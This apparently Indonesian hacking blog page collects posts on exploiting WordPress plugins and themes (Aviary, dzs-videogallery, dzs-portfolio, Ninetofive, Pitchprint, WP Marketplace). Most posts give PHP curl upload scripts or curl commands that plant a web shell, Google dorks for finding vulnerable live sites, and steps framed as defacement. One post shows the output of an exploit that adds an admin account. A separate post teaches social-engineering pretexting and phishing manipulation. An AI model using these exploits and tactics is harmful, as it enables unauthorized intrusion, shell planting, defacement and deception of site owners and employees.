Assalamualaikum,

Kali ini ane mau share Exploit WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload Vulnerability, langsung saja yuk :D

= Author: Larry W. Cashdollar, @_larry0
= Date: 2015-06-07
= Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
= Vendor: Waters Edge Web Design and NetherWorks LLC
= Vendor Notified: 2015-06-08
= Advisory: http://www.vapid.dhs.org/advisory.php?v=125
= Vulnerability in 'upload.php': BLANK Page
=======================================================================

Vulnerability:

There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an unauthenticated user can upload any file to the system.  Including a .php file.  The upload.php doesn't check that the user is authenticated and a simple post will allow arbitrary code to be uploaded to the server.

Exploit Code :

<?php

/*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
/*Larry W. Cashdollar @_larry0

6/7/2015
shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
 */


  $target_url = 'http://www.vapidlabs.com/wp-content/plugins/aviary-image-editor-add-on-
for-gravity-forms/includes/
 upload.php';
 $file_name_with_full_path = '/var/www/nameshell.php';
 echo "POST to $target_url $file_name_with_full_path";
 $post = array('name' => 'nameshell.php','gf_aviary_file'=>'@'.$file_name_with_full_path);
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL,$target_url);
 curl_setopt($ch, CURLOPT_POST,1);
 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
 $result=curl_exec ($ch);
 curl_close ($ch);
 echo "<hr>";
 echo $result;
 echo "<hr>";


 ?> 


Sekaian dan Terima Kasih,
Wassalamualaikum wr.wb

Cara Deface Dengan Aviary Imaege Editor
Deface Dengan WP Aviary Image Editor
0
Assalamualaikum,

Nggak usah banyak cincong -_- langsung saja

# Exploit Title: WordPress dzs-videogallery Plugins Remote File Upload Vulnerability
# Google dork:inurl:/wp-content/plugins/dzs-videogallery/
# Tested on : Windows/Linux
# Vulnerability "upload.php" : "not" or "not for direct access"


 Exploit :

/wp-content/plugins/dzs-videogallery/admin/upload.php
/wp-content/plugins/dzs-videogallery/upload.php

 <?php

$uploadfile="shell.phtml";
$ch = curl_init("localhost/wp-content/plugins/dzs-videogallery/admin/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('file_field'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch); curl_close($ch);
echo "$postResult";


?> 


localhost/wp-content/plugins/dzs-videogallery/admin/upload/shell.phtml
or
localhost/wp-content/plugins/dzs-videogallery/upload/shell.phtml


Sekian dan terima kasih, Wassalamualaikum wr.wb


Deface dengan DZS Video Gallery
Deface dengan Wordpress Video Gallery
0
Assalamualaikum,

udah gausah basa basi, langsung saja -_-


# Exploit Title: WordPress dzs-portfolio Plugins Remote File Upload Vulnerability
# Google dork:inurl:/wp-content/plugins/dzs-portfolio/
# Tested on : Windows/Linux
# Vulnerability "upload.php" : "not" or "not for direct access"

Exploit :

/wp-content/plugins/dzs-portfolio/admin/upload.php
/wp-content/plugins/dzs-portfolio/upload.php

<?php

$uploadfile="shell.phtml";
$ch = curl_init("localhost/wp-content/plugins/dzs-portfolio/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('file_field'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch); curl_close($ch);
echo "$postResult";


?>



localhost/wp-content/plugins/dzs-portfolio/upload/shell.phtml
localhost/wp-content/plugins/dzs-portfolio/upload/admin/shell.phtml


Sekian dan terima kasih, Wassalamualaikum wr.wb


Deface dengan DZS Portfolio
Deface dengan Wordpress Portfolio
0

The Art of Social Engineering

Nggak ada bahan posting, dan kebetulan tadi jalan-jalan ke HN ada yang bahas soceng, akhirnya saya jadi punya ide untuk membahas apa itu soceng.

Menurut Wikipedia, Social engineering adalah pemerolehan informasi atau maklumat rahasia/sensitif dengan cara menipu pemilik informasi tersebut.

Pada dasarnya manusia cenderung mudah percaya dan menghindari konflik. Social Engineering memanfaatkan dua kelemahan tersebut.

Soceng biasanya dilakukan melalui telepon atau Internet. Soceng merupakan salah satu metode yang digunakan oleh hacker untuk memperoleh informasi tentang targetnya, entah itu menayakan langsung ataupun melalui pihak lain.

Soceng mengkonsentrasikan diri pada user (manusia). Seperti kita tahu, tidak ada sistem komputer yang tidak melibatkan interaksi manusia. Dan parahnya lagi, celah keamanan ini bersifat universal, tidak tergantung platform, sistem operasi, protokol, software ataupun hardware. Artinya, setiap sistem mempunyai kelemahan yang sama pada faktor manusia. Setiap orang yang mempunyai akses kedalam sistem secara fisik adalah ancaman, bahkan jika orang tersebut tidak termasuk dalam kebijakan kemanan yang telah disusun.Soceng sendiri mmemerlukan persiapan yang agak lama sebelum penyerang mengeksekusi korbannya.

Pada banyak referensi, manusia dinilai sebagai faktor paling lemah dalam jaringan komputer. Kita ambil contoh, untuk apa komputer canggih dengan sistem keamanan yang baik jika yang jadi administrator adalah orang yang samasekali tidak tahu tentang security ?. Selain itu, pada sebuah jaingan yang cukup kompleks biasanya terdapat banyak user yang meremehkan masalah keamanan . misalnya, suatu perusahaan memiliki sistem keamanan yang cukup baik. Namun bagaimana jika ada user yang memiliki akun dengan password "nama perusahaan" tersebut ? Itu mudah ditebak ! Sekali tebak maka Acces Granted ! Atau saking buru-burunya, user lupa log-out ketika pulang kerja.

Kalau sudah seperti itu, penyerang dengan mudah mengetahui siapa saja orang yang ceroboh pada perusahaan tersebut. Dan bisa saja penyerang menanyakan apa saja yang dibutuhkan/diinginkan kepada user yang ceroboh tersebut. Tindakan ini bisebut sebagai : Social Engineering (SOCENG)

Metode pertama adalah metode yang paling dasar dalam soceng, yaitu penyerang mencoba untuk meminta secara langsung dan terang-terangan apa yang diinginkan dari korban.

Cara kedua adalah dengan menciptakan situasi palsu dimana korban masuk dalam situasi tersebut. Dalam hal ini penyerang memerlukan informasi lebih lanjut dan biasanya juga harus mengumpulkan informasi tambahan tentang ‘target’. Kita tidak harus berbohong untuk menciptakan situasi tesebut, kadangkala fakta-fakta lebih bisa diterima oleh target.

Example : Seorang berpura-pura sebagai agen tiket yang menelepon salah satu pegawai perusahaan untuk konfirmasi bahwa tiket liburannya telah dipesan dan siap dikirim (tentu saja ini hanya jebakan betmen). Pemesanan dilakukan dengan nama serta posisi target di perusahaan itu, dan perlu mencocokkan data dengan target. Tentu saja target tidak merasa memesan tiket, dan penyerang tetap perlu mencocokkan nama, serta nomor pegawainya. Informasi ini bisa digunakan sebagai informasi awal untuk masuk ke sistem di perusahaan tersebut dengan account target.Jadi intinya pelaku tadi menelpon hanya untuk mencocokkan data yang dia miliki dengan data yang dimiliki korban. Dalam hal ini tentu korban tidak akan curiga !

Cara yang paling populer adalah metode phising, yaitu dengan mengirim email ke korban dan didalam emailnya terdapat link, trojan maupun worm yang berfungsi mencuri data dari komputer korban. Tentu saja jika korban mau meng-klik link yang terdapat pada email tersebut. Maka disinilah keahlian pengirim email dibituhkan : membuat korban mengeklik link tanpa curiga sedikitpun

Cara-cara tersebut biasanya melibatkan faktor personal dari target: kurangnya tanggung jawab, ingin dipuji dan kewajiban moral. Kadang target merasa bahwa tindakannya memberikan informasi tidak akan menimbulkan efek buruk. Atau target merasa bahwa dengan memenuhi keinginan penyerang akan membuat dia dipuji. Atau dia merasa bahwa dengan melakukan sesuatu akan membantu pihak lain dan itu memang sudah kewajibannya untuk membantu orang lain. Jadi kita tidak harus memaksa korban untuk memberikan informasi, karena korban akan memberikannya dengan sukarela. Selanjutnya, kita tinggal menuntun taeget menuruti apa yang kita mau, dan korban tidak merasa bahwa dia sedang dimanfaatkan. Target merasa bahwa dia membuat keputusan yang baik untuk membantu kita dan mengorbankan sedikit waktu dan tenaganya.

Riset psikologi juga menunjukkan bahwa seorang akan lebih mudah memenuhi keinginan jika sebelumnya sudah pernah berurusan, sebelum permintaan inti cobalah untuk meminta target melakukan hal-hal kecil terlebih dahulu.

Sekian postingan dari saya, terimakasih .

 

Apa itu soceng ?
Pengertian Soceng
Social engineering itu apa ?

 

Source : Madura Cyber

 

0
Assalamualaikum wr wb :D apa kabar semua ? baik baik aja kan ? kalo ane sih Alhamdulillah baik :D kali ini ane mau share WordPress Theme Ninetofive Remote Exploit :D ok langsung saja disimak bre ;)


Bahan Bahan :

- CGI Shell ( Download here )


Langkah - Langkah :

1. Pertama kita cari dulu web vuln nya di google, masukin dork berikut :
    "inurl:/wp-content/themes/ninetofive"  ( Di kembangin lagi :D )

2. Lalu pilih salah satu web, dan masukin exploit berikut ini :
    "/wp-content/themes/ninetofive/scripts/doajaxfileupload.php"

3. Jika vuln akan muncul bacaan seperti gambar dibawah ini :
       
4. Setelah itu kita buka CGI Shell nya, tapi sebelumnya upload dulu CGI Shell nya ke web
  
5. Lalu klik CGI Shell ( liat di atas gambar )
6. Setelah di klik, masukin password nya, password nya adalah webr00t
7. Jika sudah login, klik bacaan 'Upload File'
 


8. Lalu upload shell kalian
9. Setelah diupload, tinggal kita eksekusi :D masukin perintah berikut dan Tekan enter :D
    curl -v -F "qqfile=@namashellkalian.php" "http://localhost/wp-content/themes/ninetofive/scripts/doajaxfileupload.php"
   
     
10. Jika berhasil akan seperti gambar dibawah ini :
     
11. Set-Cookie: PixelAttached_1=%2Fhome%2Fsciencef%2Fpublic_html%2Flocalhost%2Fwp-content%2Fuploads%2F2015%2F03%2Fjoms_551a89b87c7d7.php; expires=Tue, 31-Mar-2015 12:49:12 

 joms_551a89b87c7d7.php < ini adalah shell kita :D, tinggal di akses deh :D 

* Kadang nama shell kita berubah jadi random, contoh : 11das871kls61kja679a5651gay.php


 Tempat akses shell :   http://localhost/wp-content/uploads/tahun/bulan/shell.php
                                 http://localhost/wp-content/themes/ninetofive/scripts/uploads/shell.php


OK sekian dan salam Ganteng :D Wassalamualaikum wr wb :D

  
1
 
 
 
 
 ___ ___               __                                         
   |   Y   .-----.----.--|  .-----.----.-----.-----.-----.           
   |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|           
   |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|           
   |:      |                |__|                                     
   |::.|:. |                                                         
    --- ---'                                                         
       ___ ___            __          __         __                  
      |   Y   .---.-.----|  |--.-----|  |_.-----|  .---.-.----.-----.
      |.      |  _  |   _|    <|  -__|   _|  _  |  |  _  |  __|  -__|
      |. \_/  |___._|__| |__|__|_____|____|   __|__|___._|____|_____|
      |:  |   |                           |__|                       
      |::.|:. |                                                      
       --- ---'                                                      
                                                          WP Marketplace
                                                      R3m0t3 C0d3 Ex3cut10n
                                                         (Add WP Admin)
                                                             v2.4.0

                               Written by:

                             Claudio Viviani

                          http://www.homelab.it

                             info@homelab.it
                         homelabit@protonmail.ch

                   https://www.facebook.com/homelabit
                      https://twitter.com/homelabit
                    https://plus.google.com/+HomelabIt1/
           https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

[+] Tryng to connect to: http://127.0.0.1
[!] Account Added
[!] Location: http://127.0.0.1/wp-login.php
[!] Username: yna5gM
[!] Password: Fq2Y7X
 
 
Google Dork : 
 
 index of "wpmarketplace
 

Download : 
 

wpmarketplace.py
 

Usage : 
 

python wpmarketplace.py -t http[s]://localhost[:PORT]
python wpmarketplace.py -t http[s]://localhost[:PORT]/basedir  
0
Assalamualaikum sobat bloggers :D kali ini ane mau share exploit WordPress Plugins Pitchprint Arbitrary File Upload, langsung saja disimak ;)


Bahan - Bahan :

- Shell : ( Download )
- CSRF

Script CSRF :

<form method="POST" action="http://localhost/wp-content/plugins/pitchprint/uploader/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>


Langkah - Langkah :

1. Buka www.google.com, lalu masukan dork berikut :
    inurl:/wp-content/plugins/pitchprint/  ( Kembangin lagi )

2. Lalu pilih salah satu sitenya
3. Kalo sudah menemukan sitenya, masukan exploit berikut :
    "/wp-content/plugins/pitchprint/uploader/"

4. Jika vuln akan muncul text berikut :
     files[] 

5. Langkah selanjutnya adalah membuka CSRFnya :D
6. Save, dan buka CSRFnya lalu upload shell kalian
7. Jika sukses upload shell akan seperti gambar dibawah ini :
8. Kalo shellnya berhasil ke upload, tinggal buka deh =))

   Shell akses : http://localhost/wp-content/plugins/pitchprint/uploader/files/nama-shell-kalian.php

 
  
 Sekian tutornya dan Salam Ganteng,  Wassalamualaikum wr.wb :D
0
Previous PostPostingan Lama Beranda
Diberdayakan oleh Blogger.